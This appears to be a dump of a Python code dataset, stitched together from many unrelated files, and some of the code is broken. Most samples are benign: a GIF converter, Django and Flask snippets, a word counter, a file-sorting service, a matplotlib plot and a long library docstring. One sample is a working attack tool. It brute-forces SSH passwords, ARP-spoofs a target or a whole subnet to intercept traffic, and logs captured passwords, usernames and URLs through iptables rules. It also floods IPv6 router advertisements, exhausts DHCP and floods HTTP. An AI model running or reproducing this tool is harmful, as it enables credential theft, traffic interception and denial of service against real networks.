code
stringlengths 1
199k
|
|---|
'''
ÏÂÀý չʾÁËÒ»¸öʵÓÃС¹¤¾ß, Ëü¿ÉÒÔ°Ñ GIF ¸ñʽת»»Îª Python ½Å±¾, ±ãÓÚʹÓà Tkinter ¿â.
'''
import base64, sys
if not sys.argv[1:]:
print "Usage: gif2tk.py giffile >pyfile"
sys.exit(1)
data = open(sys.argv[1], "rb").read()
if data[:4] != "GIF8":
print sys.argv[1], "is not a GIF file"
sys.exit(1)
print '# generated from', sys.argv[1], 'by gif2tk.py'
print
print 'from Tkinter import PhotoImage'
print
print 'image = PhotoImage(data="""'
print base64.encodestring(data),
print '""")'
|
import os,time,argparse,random,paramiko,socket,logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
from datetime import datetime
def brute_pass(usr,passwd,ip,port):
print "Trying for "+usr+" - "+passwd
ssh=paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(ip,port,usr,passwd)
print "Password is: ",passwd
open("foundpass","a").write("IP: "+ip+" PORT: "+port+" USER: "+usr+" PASS: "+passwd)
except paramiko.AuthenticationException:
print("Bad Password - "+passwd)
ssh.close()
except socket.error:
print("Failed connection")
ssh.close()
def EnaLogging():
os.popen("iptables -I FORWARD -p all -j LOG --log-prefix 'GENERAL-LOG-'")
#Start Logging eve,ry connection to /var/log/messages
#Log also images on /tmp?
os.popen("iptables -I FORWARD -p all -m string --string 'jpg' --algo kmp -j LOG --log-prefix 'JPG-LOG-'")
os.popen("iptables -I FORWARD -p all -m string --string 'gif' --algo kmp -j LOG --log-prefix 'GIF-LOG-'")
os.popen("iptables -I FORWARD -p all -m string --string 'png' --algo kmp -j LOG --log-prefix 'PNG-LOG-'")
os.popen("iptables -I FORWARD -p all -m string --string 'mp4' --algo kmp -j LOG --log-prefix 'mp4-LOG-'")
#Log urls/web request
os.popen("iptables -I FORWARD -p tcp -m multiport --dports 80,443 -j LOG --log-prefix 'WWW-LOG-' ")
#Log DNS
os.popen("iptables -I FORWARD -p udp --dport 53 -j LOG --log-prefix 'DNS-LOG-'")
#Log credentials HTTP
os.popen("iptables -I FORWARD -p all -m string --string 'pass' --algo kmp -j LOG --log-prefix 'PASSWORD-LOG-'")
os.popen("iptables -I FORWARD -p all -m string --string 'user' --algo kmp -j LOG --log-prefix 'USERNAME-LOG-'")
parser = argparse.ArgumentParser()
parser.add_argument('-timeout', action='store', dest='timeout', default="none",
help='Define given seconds before the attack timeouts (mitm,scan,stress) if not specified will run until is killed')
parser.add_argument('-RA', action='store', dest='ipv6ra', default=False,
help='Flood ipv6 router advertisements for given minutes')
parser.add_argument('-file', action='store', dest='output', default=False,
help='File output for scans')
parser.add_argument('-scan', action='store', dest='scan', default=False,
help='Scan the given network address or host')
parser.add_argument('--arpScan', action='store_true', dest='arpscan', default=False,
help='Arpscan to scan fast on LAN')
parser.add_argument('--syn', action='store_true', dest='syn', default=False,
help='SYN Scan enabled')
parser.add_argument('--service', action='store_true', dest='service', default=False,
help='Service Version detection enabled')
parser.add_argument('-brute', action='store', dest='brute', default="none",
help='Bruteforce SSH of given ip... example : -brute file-192.168.1.254:22')
parser.add_argument('-mitm', action='store', dest='mitm', default="none",
help='Perform MITM Attack on target')
parser.add_argument('-mitmAll', action='store', dest='mitmall', default="none",
help='Perform MITM Attack on all hosts')
parser.add_argument('-stop-mitm', action='store_true', dest='stopmitm', default=False,
help='Stop any Running MITM Attack')
parser.add_argument('-denyTcp', action='store', dest='denytcp', default="none",
help='Deny tcp connections of given host')
parser.add_argument('--dg', action='store', dest='dg', default="none",
help='Perform MITM Attack with given Default Gateway')
parser.add_argument('-craft', action='store', dest='packetcraft', default=False,
help='Enable Packet Crafting.. Example: -craft IP-TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80')
parser.add_argument('-stress', action='store', dest='stress', default="none",
help='Perform Stress Testing on LAN.. Modes: DHCPv4-50,DHCPv6')
results = parser.parse_args()
def httpflood(target):
ip=target
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 80))
s.send("""GET /?="""+str(random.randrange(9999999))+""" HTTP/1.1\r\n
Connection: Keep-Alive """)
print """GET /"""+str(random.randrange(9999999))+""" HTTP/1.1\r\n
Connection: Keep-Alive """
except ValueError:
print "Host seems down or some connection error trying again..."
if not(results.output):
output=str(time.time())
else:
output=results.output
syn=""
scantype="-sn" #basic ping scan
if not(results.timeout=="none"):
timeout="timeout "+results.timeout+"s "
print "\n\nTimeout set for seconds:"+results.timeout
else:
timeout=""
if(results.scan):
ipaddr=str(results.scan)
if(results.arpscan): ##BETA TEST
res,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ipaddr))
output=str(res.summary( lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%")))
file=open("arpscan.txt","a")
print output
file.write(output)
file.close()
else:
print ipaddr
if(results.syn):
scantype="-sS -O" #syn and
if(results.service):
scantype=scantype+" -sV"
scancmd=timeout+"sudo nmap "+scantype+" -oX "+output+" "+ipaddr #writes xml output so we can convert it into html
print scancmd
print os.popen(scancmd).read() #ping scan to know online hosts
if(results.ipv6ra):
minutes=results.ipv6ra
print "running for minutes: "+minutes
#run ipv6 RA flooding for N minutes
i=0
while (i <= minutes):
print "Firing RAs everywhere"
a = IPv6()
a.dst = "ff02::1" #IPv6 Destination "Everyone" Multicast (broadcast)
a.display()
b = ICMPv6ND_RA()
b.display()
c = ICMPv6NDOptSrcLLAddr()
c.lladdr = "00:50:56:24:3b:c0" #MAC
c.display()
d = ICMPv6NDOptMTU()
d.display()
e = ICMPv6NDOptPrefixInfo()
e.prefixlen = 64
randomhex=hex(random.randint(0, 16777215))[2:].upper()
prefix=randomhex[:4]
e.prefix = prefix+"::" #Global Prefix
e.display()
send(a/b/c/d/e) # Send the packet
print "Sending IPv6 RA Packet :)"
time.sleep(1)
i=i+1
print i
if not(results.denytcp=="none"): #Works if you are the gateway or during MITM
target=results.denytcp
os.popen("nohup "+timeout+"tcpkill host "+target+" >/dev/null 2>&1 &")
#deny tcp traffic
if not(results.mitmall=="none"): #Most efficent way to arpspoof subnet
ipnet=results.mitmall
iplist=os.popen("nmap -sP "+ipnet+" | grep 'Nmap scan' | awk '{ print $5; }'").read()
iplist=iplist.split()
dgip=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read()
dgip=dgip.split()[0]
print "Spoofing "+dgip+"\n\n"
print "Targets: \n"
for ip in iplist:
print ip
os.popen("nohup "+timeout+"arpspoof -t "+ip+" "+dgip+" >/dev/null 2>&1 &")
os.popen("nohup "+timeout+"urlsnarf >> visitedsites >/dev/null 2>&1 &")
EnaLogging() # Enable iptables-logging
if not(results.mitm=="none"):
print "im in"
target=results.mitm
if(results.dg=="none"): #Searches for gateway
dg=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read()
dg=dg.split()[0]
print dg
else:
dg=results.dg
#Automatically searches for gateway and arpspoof all hosts
os.popen("nohup "+timeout+"arpspoof -t "+target+" "+dg+" >/dev/null 2>&1 &")
os.popen("nohup "+timeout+"urlsnarf >> visitedsites &")
print "Started ARP Spoof and URL Logging"
#Start ARP Spoofing with given arguments or calculated ones
EnaLogging() # Enable iptables-logging
print "Added temp firewall rules to log MITM traffic"
if(results.packetcraft): #Packet Crafting with scapy
craft=(results.packetcraft).split("-")
if("TCP" in craft[0]):
a=IP()/TCP()
elif("UDP" in craft[0]):
a=IP()/UDP()
if("DST" in craft[1]):
ipdst=craft[1].replace("DST","")
a.dst=ipdst
if("SRC" in craft[2]):
ipsrc=craft[2].replace("SRC","")
a.src=ipsrc
if("DPORT" in craft[3]):
dport=craft[3].replace("DPORT","")
a.dport=dport
n=craft[4] ##N° of packets
i=0
while(i<=n):
i=i+1
a.display()
send(a)
print "Sent packet"
if not(results.stress=="none"):
try: #if it can
rawstring=results.stress.split("-")
mode=rawstring[0]
except:
print "Can't parse your command"
print "\nusing default DHCPv4 stress attack"
mode="DHCPv4"
count=20
if("DHCPv4" in mode): # DHCPv4-50
count=int(rawstring[1])
iface = "eth0"
unique_hexdigits = str.encode("".join(set(string.hexdigits.lower())))
print unique_hexdigits
packet = (Ether(dst="ff:ff:ff:ff:ff:ff")/
IP(src="0.0.0.0", dst="255.255.255.255")/
UDP(sport=68, dport=67)/
BOOTP(chaddr=RandString(12, unique_hexdigits))/
DHCP(options=[("message-type", "discover"), "end"]))
print "Sending dhcp requests"
sendp(packet,iface=iface,count=count)
if("HTTP" in mode): #HTTP-192.168.1.1-500
ip=rawstring[1]
count=int(rawstring[2])
i=0
while(i<=count):
i=i+1
httpflood(ip)
print "Finished flooding!"
if not(results.brute=="none"): # file-192.168.1.254:22 # file example : usr:pass format!!
cmd=results.brute ### Parsing strings to avoid errors
file=cmd.split("-")[0]
ip=cmd.split("-")[1]
ipparsed=ip.split(":")
ip=ipparsed[0].split()[0]
port=int(ipparsed[1].split()[0]) #remove spaces and then int
f=open(file,"r")
print "Start bruteforcing "+ip+" with list: "+file
for line in f:
usr=line.split(":")[0].split()[0] # remove spaces if any
passwd=line.split(":")[1].split()[0] #like above
brute_pass(usr,passwd,ip,port)
if(results.stopmitm): #Stop MITM...hosts should re-generate ARP automatically
os.popen("killall arpspoof")
os.popen("killall tcpkill")
|
from setuptools import setup
setup(name='PyRankinity',
version='0.1',
description='Rankinity API Wrapper - See http://my.rankinity.com/api.en',
author='UpCounsel',
author_email='brad@upcounsel.com',
url='https://www.github.com/upcounsel/pyrankinity',
packages=['pyrankinity'],
install_requires=[
'requests',
],
license='MIT'
)
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^external/', include('external.urls')),
url(r'^dev/', include('dev.urls')),
]
|
from collections import defaultdict
import re
import sys
from stop_words import STOP_WORD_SET
from collections import Counter
PUNCTUATION_RE = re.compile("[%s]" % re.escape(
"""!"&()*+,-\.\/:;<=>?\[\\\]^`\{|\}~]+"""))
DISCARD_RE = re.compile("^('{|`|git@|@|https?:)")
def remove_stop_words(word_seq, stop_words):
"""Sanitize using intersection and list.remove()"""
return [w for w in word_seq if w and w not in stop_words]
def remove_punctuation(word_seq):
def remove_punc_inner(word):
return PUNCTUATION_RE.sub("", word)
removed = map(remove_punc_inner, word_seq)
# Remove emptry strings
return [w for w in removed if w]
def filter_discards(word_seq):
def discard(word):
return not DISCARD_RE.match(word)
return filter(discard, word_seq)
def count_words_from_seq(word_seq):
word_count = defaultdict(int)
for word in word_seq:
word_count[word] += 1
return word_count
def keep_top_n_words(word_counts, n):
return dict(Counter(word_counts).most_common(n))
def count_words(text_blob):
word_seq = re.split('[=|\s]+', text_blob.lower())
print ' Splitting blob'
word_seq = filter_discards(word_seq)
print ' Filtering discards'
word_seq = remove_punctuation(word_seq)
print ' Removing punctuation'
word_seq = remove_stop_words(word_seq, STOP_WORD_SET)
print ' Removing stop words'
word_counts = count_words_from_seq(word_seq)
print ' Counting words'
top_n = keep_top_n_words(word_counts, 100)
print ' Filtering to top 100 words'
return top_n
if __name__ == '__main__':
print count_words(sys.stdin.read())
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('contacts', '0006_auto_20180423_1629'),
]
operations = [
migrations.AddField(
model_name='contact',
name='recruiter',
field=models.BooleanField(default=False),
),
]
|
from __future__ import unicode_literals
import os
import socket
import traceback
from lineup.datastructures import Queue
class Node(object):
def __init__(self, *args, **kw):
self.initialize(*args, **kw)
def initialize(self, *args, **kw):
pass
@property
def id(self):
return '|'.join([self.get_hostname(), str(os.getpid())])
@property
def taxonomy(self):
class_name = self.__class__.__name__
module_name = self.__class__.__module__
return '.'.join([module_name, class_name])
def get_name(self):
return getattr(self, 'name', None) or self.taxonomy
def get_hostname(self):
return socket.gethostname()
def make_worker(self, Worker, index):
return Worker(self, self.input, self.output)
def start(self):
for worker in self.workers:
worker.start()
def feed(self, item):
self.input.put(item)
def enqueue_error(self, source_class, instructions, exception):
print exception, source_class, instructions
def wait_and_get_work(self):
return self.output.get()
@property
def running(self):
return all([w.alive for w in self.workers])
def are_running(self):
if self.running:
return True
self.start()
return self.running
class Pipeline(Node):
def initialize(self):
self.queues = self.get_queues(*args, **kw)
self.workers = [self.make_worker(Worker, index) for index, Worker in enumerate(steps)]
@property
def input(self):
return self.queues[0]
@property
def output(self):
return self.queues[-1]
def get_queues(self):
steps = getattr(self, 'steps', None) or []
return [Queue() for _ in steps] + [Queue()]
def make_worker(self, Worker, index):
return Worker(self, self.queues[index], self.queues[index + 1])
|
from flask import Blueprint
user = Blueprint('user', __name__)
from . import views
|
import datetime
import os
import shutil
import time
from files_by_date.utils.logging_wrapper import get_logger, log_message
from files_by_date.validators.argument_validator import ArgumentValidator
logger = get_logger(name='files_service')
class FilesService:
def __init__(self):
raise NotImplementedError
@classmethod
def gather_files(cls, parent_directory, files):
for dir_name, subdir_list, file_list in os.walk(parent_directory):
if file_list:
files.extend(
['{dir_name}{os_sep}{file_name}'.format(dir_name=dir_name, os_sep=os.sep, file_name=file) for file
in file_list])
# [f'{dir_name}{os.sep}{file}' for file in file_list] # 3.6
for subdir in subdir_list:
files = cls.gather_files(subdir, files)
return files
@classmethod
def group_files_by_modified_date(cls, files):
grouped_files = {}
for file in files:
directory_tag = cls._get_directory_tag_for_file(file)
file_group = grouped_files.get(directory_tag, list())
file_group.append(file)
grouped_files[directory_tag] = file_group
return grouped_files
@classmethod
def copy_files(cls, file_groups, target_dir, force_overwrite):
if not os.path.exists(target_dir):
os.makedirs(target_dir) # TODO: not covered
total_count = Count()
for group in file_groups:
group_count = Count()
# group_dir = f'{target_dir}{os.sep}{group}' # 3.6
group_dir = '{target_dir}{os_sep}{group}'.format(target_dir=target_dir, os_sep=os.sep, group=group)
ArgumentValidator.validate_target_dir(group_dir)
if not os.path.exists(group_dir):
os.makedirs(group_dir)
# log_message(f'Created directory: {group_dir}') # 3.6
log_message('Created directory: {group_dir}'.format(group_dir=group_dir))
# log_message(f'Copying {len(file_groups[group])} files to {group_dir}') # 3.6
log_message('Moving {group_size} files to {group_dir}'.format(group_size=len(file_groups[group]),
group_dir=group_dir))
for file in file_groups[group]:
# file_path = f'{group_dir}{os.sep}{os.path.basename(file)}' # 3.6
file_path = '{group_dir}{os_sep}{file_name}'.format(group_dir=group_dir, os_sep=os.sep,
file_name=os.path.basename(file))
if force_overwrite and os.path.exists(file_path):
os.remove(file_path)
if not os.path.exists(file_path):
shutil.copy2(file, group_dir)
group_count.add_copied(count=1)
else:
group_count.add_skipped(count=1) # TODO: not covered
total_count.add_files(count=len(file_groups[group]))
total_count.add_copied(count=group_count.copied)
total_count.add_skipped(count=group_count.skipped)
# log_message(f'Copied {group_count.copied}, skipped {group_count.skipped}') # 3.6
log_message('Copied {local_copied_count}, skipped {local_skipped_count}'.format(
local_copied_count=group_count.copied, local_skipped_count=group_count.skipped))
log_message(
# f'Total files count {total_count.files}, total copied {total_count.copied}, total skipped {total_count.skipped}') # 3.6
'Total files count {total_files_count}, total copied {total_copied_count}, total skipped {total_skipped_count}'.format(
total_files_count=total_count.files,
total_copied_count=total_count.copied,
total_skipped_count=total_count.skipped))
return total_count
@staticmethod
def _get_directory_tag_for_file(file):
return datetime.datetime.strptime(time.ctime(os.path.getmtime(file)), "%a %b %d %H:%M:%S %Y").strftime('%Y%m')
class Count:
def __init__(self, *, files=0, copied=0, skipped=0):
self.files = files
self.copied = copied
self.skipped = skipped
def __str__(self):
# return f'files={self.files}, copied={self.copied}, skipped={self.skipped}' # 3.6
return 'files={files}, copied={copied}, skipped={skipped}'.format(files=self.files, copied=self.copied,
skipped=self.skipped)
def add_files(self, *, count=1):
self.files += count
def add_copied(self, *, count=0):
self.copied += count
def add_skipped(self, *, count=0):
self.skipped += count
|
"""
Example taken from http://matplotlib.org/1.5.0/examples/showcase/xkcd.html
"""
import matplotlib.pyplot as plt
import numpy as np
with plt.xkcd():
# Based on "The Data So Far" from XKCD by Randall Monroe
# http://xkcd.com/373/
index = [0, 1]
data = [0, 100]
labels = ['CONFIRMED BY EXPERIMENT', 'REFUTED BY EXPERIMENT']
fig = plt.figure()
ax = fig.add_axes((0.1, 0.2, 0.8, 0.7))
ax.bar(index, data, 0.25)
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.set_xticks([0, 1])
ax.set_xlim([-0.5, 1.5])
ax.set_ylim([0, 110])
ax.set_xticklabels(labels)
plt.yticks([])
plt.title("CLAIMS OF SUPERNATURAL POWERS")
fig.text(
0.5, 0.05,
'"The Data So Far" from xkcd by Randall Monroe',
ha='center')
plt.show()
|
"""Use python in a more object oriented, saner and shorter way.
First: A word of warning. This library is an experiment. It is based on a wrapper that aggressively
wraps anything it comes in contact with and tries to stay invisible from then on (apart from adding methods).
However this means that this library is probably quite unsuitable for use in bigger projects. Why?
Because the wrapper will spread in your runtime image like a virus, 'infecting' more and more objects
causing strange side effects. That being said, this library is perfect for short scripts and especially
'one of' shell commands. Use it's power wisely!
This library is heavily inspired by jQuery and underscore / lodash in the javascript world. Or you
could say that it is inspired by SmallTalk and in extension Ruby and how they deal with collections
and how to work with them.
In JS the problem is that the standard library sucks very badly and is missing many of the
most important convenience methods. Python is better in this regard, in that it has (almost) all
those methods available somewhere. BUT: quite a lot of them are available on the wrong object or
are free methods where they really should be methods. Examples: `str.join` really should be on iterable.
`map`, `zip`, `filter` should really be on iterable. Part of this problem comes from the design
choice of the python language, to provide a strange kind of minimal duck typing interface with the __*__
methods that the free methods like `map`, `zip`, `filter` then use. This however has the unfortunate
side effect in that writing python code using these methods often requires the reader to mentally skip
back and forth in a line to parse what it does. While this is not too bad for simple usage of these
functions, it becomes a nightmare if longer statements are built up from them.
Don't believe me? Try to parse this simple example as fast as you can:
>>> map(print, map(str.upper, sys.stdin.read().split('\n')))
How many backtrackings did you have to do? To me this code means, finding out that it starts in the
middle at `sys.stdin.read().split('\n')`, then I have to backtrack to `map(str.upper, …)`, then to
`map(print, …)`. Then while writing, I have to make sure that the number of parens at the end are
correct, which is something I usually have to use editor support for as it's quite hard to accurately
identify where the matching paren is.
The problem with this? This is hard! Hard to write, as it doesn't follow the way I think about this
statement. Literally, this means I usually write these statements from the inside out and wrap them
using my editor as I write them. As demonstrated above, it's also hard to read - requireing quite a
bit of backtracking.
So, what's the problem you say? Just don't do it, it's not pythonic you say! Well, Python has two
main workarounds available for this mess. One is to use list comprehension / generator
statements like this:
>>> [print(line.upper()) for line in sys.stdin.read().split('\n')]
This is clearly better. Now you only have to skip back and forth once instead of twice Yay! Win!
To me that is not a good workaround. Sure it's nice to easily be able to create generators this
way, but it still requires of me to find where the statement starts and to backtrack to the beginning
to see what is happening. Oh, but they support filtering too!
>>> [print(line.upper()) for line in sys.stdin.read().split('\n') if line.upper().startswith('FNORD')]
Well, this is little better. For one thing, this doesn't solve the backtracking problem, but more
importantly, if the filtering has to be done on the processed version (here artificially on
`line.upper().startswith()`) then the operation has to be applied twice - which sucks because you have to write it twice, but also because it is computed twice.
The solution? Nest them!
[print(line) for line in (line.upper() for line in sys.stdin.read().split('\n')) if line.startswith('FNORD')]
Do you start seing the problem?
Compare it to this:
>>> for line in sys.stdin.read().split('\n'):
>>> uppercased = line.upper()
>>> if uppercased.startswith('FNORD'):
>>> print(uppercased)
Almost all my complaints are gone. It reads and writes almost completely in order it is computed.
Easy to read, easy to write - but one drawback. It's not an expression - it's a bunch of statements.
Which means that it's not easily combinable and abstractable with higher order methods or generators.
Also (to complain on a high level), you had to invent two variable names `line` and `uppercased`.
While that is not bad, especially if they explain what is going on - in this case it's not really
helping _and_ (drummroll) it requires some backtracking and buildup of mental state to read. Oh well.
Of course you can use explaining variables to untangle the mess of using higher order functions too:
Consider this code:
>>> cross_product_of_dependency_labels = \
>>> set(map(frozenset, itertools.product(*map(attrgetter('_labels'), dependencies))))
That certainly is hard to read (and write). Pulling out explaining variables, makes it better. Like so:
>>> labels = map(attrgetter('_labels'), dependencies)
>>> cross_product_of_dependency_labels = set(map(frozenset, itertools.product(*labels)))
Better, but still hard to read. Sure, those explaining variables are nice and sometimes
essential to understand the code. - but it does take up space in lines, and space in my head
while parsing this code. The question would be - is this really easier to read than something
like this?
>>> cross_product_of_dependency_labels = _(dependencies) \
>>> .map(_.each._labels) \
>>> .star_call(itertools.product) \
>>> .map(frozenset) \
>>> .call(set)
Sure you are not used to this at first, but consider the advantages. The intermediate variable
names are abstracted away - the data flows through the methods completely naturally. No jumping
back and forth to parse this at all. It just reads and writes exactly in the order it is computed.
What I think that I want to accomplish, I can write down directly in order. Oh, and I don't have
to keep track of extra closing parantheses at the end of the expression.
So what is the essence of all of this?
Python is an object oriented language - but it doesn't really use what object orientation has tought
us about how we can work with collections and higher order methods in the languages that came before it
(especially SmallTalk, but more recently also Ruby). Why can't I make those beautiful fluent call chains
that SmallTalk could do 20 years ago in Python today?
Well, now you can.
To enable this style of coding this library has some features that might not be so obvious at first.
The most important entry point for this library is the function `wrap` or the perhaps preferrable and
shorter alias `_`:
>>> _(something)
>>> # or
>>> wrap(something)
`wrap` is a factory function that returns a subclass of Wrapper, the basic and main object of this library.
This does two things: First it ensures that every attribute access, item access or method call off of
the wrapped object will also return a wrapped object. This means that once you wrap something, unless
you unwrap it explicitly via `.unwrap` or `._` it stays wrapped - pretty much no matter what you do
with it. The second thing this does is that it returns a subclass of Wrapper that has a specialized set
of methods depending on the type of what is wrapped. I envision this to expand in the future, but right
now the most usefull wrappers are: Iterable, where we add all the python collection functions (map,
filter, zip, reduce, …) as well as a good batch of methods from itertools and a few extras for good
measure. Callable, where we add `.curry()` and `.compose()` and Text, where most of the regex methods
are added.
Import statements are (ahem) statements in python. This is fine, but can be really annoying at times.
Consider this shell text filter written in python:
$ curl -sL 'https://www.iblocklist.com/lists.php' | egrep -A1 'star_[345]' | python3 -c "import sys, re; from xml.sax.saxutils import unescape; print('\n'.join(map(unescape, re.findall(r'value=\'(.*)\'', sys.stdin.read()))))"
Sure it has all the backtracking problems I talked about already. Using fluent this would already be much better.
$ curl -sL 'https://www.iblocklist.com/lists.php' \
| egrep -A1 'star_[345]' \
| python3 -c "from fluent import *; import sys, re; from xml.sax.saxutils import unescape; _(sys.stdin.read()).findall(r'value=\'(.*)\'').map(unescape).map(print)"
But this still leaves the problem that it has to start with this fluff
`from fluent import *; import sys, re; from xml.sax.saxutils import unescape;`
This doesn't really do anything to make it easier to read and write and is almost half the characters
it took to achieve the wanted effect. Wouldn't it be nice if you could have
some kind of object (lets call it `lib` for lack of a better word), where you could just access the whole
python library via attribute access and let it's machinery handle importing behind the scenes?
Like this:
$ curl -sL 'https://www.iblocklist.com/lists.php' | egrep -A1 'star_[345]' | python3 -m fluent "lib.sys.stdin.read().findall(r'value=\'(.*)\'').map(lib.xml.sax.saxutils.unescape).map(print)"
How's that for reading and writing if all the imports are inlined? Oh, and of course everything imported
via `lib` comes already pre-wrapped, so your code becomes even shorter.
More formally:The `lib` object, which is a wrapper around the python import machinery, allows to import
anything that is accessible by import to be imported as an expression for inline use.
So instead of
>>> import sys
>>> input = sys.stdin.read()
You can do
>>> input = lib.sys.stdin.read()
As a bonus, everything imported via lib is already pre-wrapped, so you can chain off of it immediately.
`lib` is also available on `_` which is itself just an alias for `wrap`. This is usefull if you want
to import fewer symbols from fluent or want to import the library under a custom name
>>> from fluent import _ # alias for wrap
>>> _.lib.sys.stdin.split('\n').map(str.upper).map(print)
>>> from fluent import _ as fluent # alias for wrap
>>> fluent.lib.sys.stdin.split('\n').map(str.upper).map(print)
Not sure if that is so super usefull though, as you could also just do:
>>> import fluent
>>> fluent.lib.sys.stdin.split('\n').map(str.upper).map(print)
`lambda` is great - it's often exactly what the doctor ordered. But it can also be a bit annyoing
if you have to write it down everytime you just want to get an attribute or call a method on every
object in a collection.
>>> _([dict(fnord='foo'), dict(fnord='bar')]).map(lambda each: each['fnord']) == ['foo', 'bar]
>>> class Foo(object):
>>> attr = 'attrvalue'
>>> def method(self, arg): return 'method+'+arg
>>> _([Foo(), Foo()]).map(lambda each: each.attr) == ['attrvalue', 'attrvalue']
>>> _([Foo(), Foo()]).map(lambda each: each.method('arg')) == ['method+arg', 'method+arg']
Sure it works, but wouldn't it be nice if we could save a variable and do this a bit shorter?
I mean, python does have attrgetter, itemgetter and methodcaller - they are just a bit
inconvenient to use:
>>> from operator import itemgetter, attrgetter, methodcaller
>>> _([dict(fnord='foo'), dict(fnord='bar')]).map(itemgetter('fnord')) == ['foo', 'bar]
>>> class Foo(object):
>>> attr = 'attrvalue'
>>> def method(self, arg): return 'method+'+arg
>>> _([Foo(), Foo()]).map(attrgetter(attr)) == ['attrvalue', 'attrvalue']
>>> _([Foo(), Foo()]).map(methodcaller(method, 'arg')) == ['method+arg', 'method+arg']
So there is an object `_.each` that just exposes a bit of syntactic shugar for these
(and a few operators). Basically, everything you do to `_.each` it will do to each object
in the collection:
>>> _([1,2,3]).map(_.each + 3) == [4,5,6]
>>> _([1,2,3]).filter(_.each < 3) == [1,2]
>>> _([1,2,3]).map(- _.each) == [-1,-2,-3]
>>> _([dict(fnord='foo'), dict(fnord='bar')]).map(_.each['fnord']) == ['foo', 'bar]
>>> class Foo(object):
>>> attr = 'attrvalue'
>>> def method(self, arg): return 'method+'+arg
>>> _([Foo(), Foo()]).map(_.each.attr) == ['attrvalue', 'attrvalue']
>>> _([Foo(), Foo()]).map(_.each.call.method('arg')) == ['method+arg', 'method+arg']
Yeah I know `_.each.call.*()` is crude - but I haven't found a good syntax to get rid of
the .call yet. Feedback welcome.
A major nuissance for using fluent interfaces are methods that return None. Now this is mostly
a feature of python, where methods that don't have a return statement return None.
While this is way better than e.g. Ruby where that will just return the value of the last
expression - which means objects constantly leak internals, it is very annoying if you want to
chain off of one of these method calls. Fear not though, fluent has you covered. :)
Fluent wrapped objects will behave more like SmallTalk objects, in that they pretend
that every method that returns None actually returned self - thus allowing chaining. So this just works:
>>> _([3,2,1]).sort().reverse().call(print)
Even though both sort() and reverse() return None
Of course, if you unwrap at any point with `.unwrap` or `._` you will get the true return value of `None`.
This library tries to do a little of what underscore does for javascript. Just provide the missing glue to make the standard library nicer and easier to use - especially for short oneliners or short script. Have fun!
While I know that this is not something you want to use in big projects (see warning at the beginning)
I envision this to be very usefull in quick python scripts and shell one liner filters, where python was previously just that little bit too hard to use, that 'overflowed the barrel' and prevented you from doing so.
"""
"""Future Ideas:
or wrap([1,2,3]).call(len).times(yank_me)
Rework _.each.call.foo(bar) so 'call' is no longer a used-up symbol on each.
Also _.each.call.method(...) has a somewhat different meaning as the .call method on callable
could _.each.method(_, ...) work when auto currying is enabled?
Rework fluent so explicit unwrapping is required to do anythign with wrapped objects.
(Basically calling ._ at the end)
The idea here is that this would likely enable the library to be used in big / bigger
projects as it looses it's virus like qualities.
* Maybe this is best done as a separate import?
* This would also be a chance to consider always using the iterator versions of
all the collection methods under their original name and automatically unpacking
/ triggering the iteration on ._? Not sure that's a great idea, as getting the
iterator to abstract over it is a) great and b) triggering the iteration is also
hard see e.g. groupby.
* This would require carefull analysis where wrapped objects are handed out as arguments
to called methods e.g. .tee(). Also requires __repr__ and __str__ implementations that
make sense.
Roundable (for all numeric needs?)
round, times, repeat, if_true, if_false, else_
if_true, etc. are pretty much like conditional versions of .tee() I guess.
.if_true(function_to_call).else_(other_function_to_call)
"""
__all__ = [
'wrap', # generic wrapper factory that returns the appropriate subclass in this package according to what is wrapped
'_', # _ is an alias for wrap
'lib', # wrapper for python import machinery, access every importable package / function directly on this via attribute access
]
import typing
import re
import math
import types
import functools
import itertools
import operator
import collections.abc
def wrap(wrapped, *, previous=None, chain=None):
"""Factory method, wraps anything and returns the appropriate Wrapper subclass.
This is the main entry point into the fluent wonderland. Wrap something and
everything you call off of that will stay wrapped in the apropriate wrappers.
"""
if isinstance(wrapped, Wrapper):
return wrapped
by_type = (
(types.ModuleType, Module),
(typing.Text, Text),
(typing.Mapping, Mapping),
(typing.AbstractSet, Set),
(typing.Iterable, Iterable),
(typing.Callable, Callable),
)
if wrapped is None and chain is None and previous is not None:
chain = previous.chain
decider = wrapped
if wrapped is None and chain is not None:
decider = chain
for clazz, wrapper in by_type:
if isinstance(decider, clazz):
return wrapper(wrapped, previous=previous, chain=chain)
return Wrapper(wrapped, previous=previous, chain=chain)
_ = wrap
def wrapped(wrapped_function, additional_result_wrapper=None, self_index=0):
"""
Using these decorators will take care of unwrapping and rewrapping the target object.
Thus all following code is written as if the methods live on the wrapped object
Also perfect to adapt free functions as instance methods.
"""
@functools.wraps(wrapped_function)
def wrapper(self, *args, **kwargs):
result = wrapped_function(*args[0:self_index], self.chain, *args[self_index:], **kwargs)
if callable(additional_result_wrapper):
result = additional_result_wrapper(result)
return wrap(result, previous=self)
return wrapper
def unwrapped(wrapped_function):
"""Like wrapped(), but doesn't wrap the result.
Use this to adapt free functions that should not return a wrapped value"""
@functools.wraps(wrapped_function)
def forwarder(self, *args, **kwargs):
return wrapped_function(self.chain, *args, **kwargs)
return forwarder
def wrapped_forward(wrapped_function, additional_result_wrapper=None, self_index=1):
"""Forwards a call to a different object
This makes its method available on the wrapper.
This specifically models the case where the method forwarded to,
takes the current object as its first argument.
This also deals nicely with methods that just live on the wrong object.
"""
return wrapped(wrapped_function, additional_result_wrapper=additional_result_wrapper, self_index=self_index)
def tupleize(wrapped_function):
""""Wrap the returned obect in a tuple to force execution of iterators.
Especially usefull to de-iterate methods / function
"""
@functools.wraps(wrapped_function)
def wrapper(self, *args, **kwargs):
return wrap(tuple(wrapped_function(self, *args, **kwargs)), previous=self)
return wrapper
class Wrapper(object):
"""Universal wrapper.
This class ensures that all function calls and attribute accesses
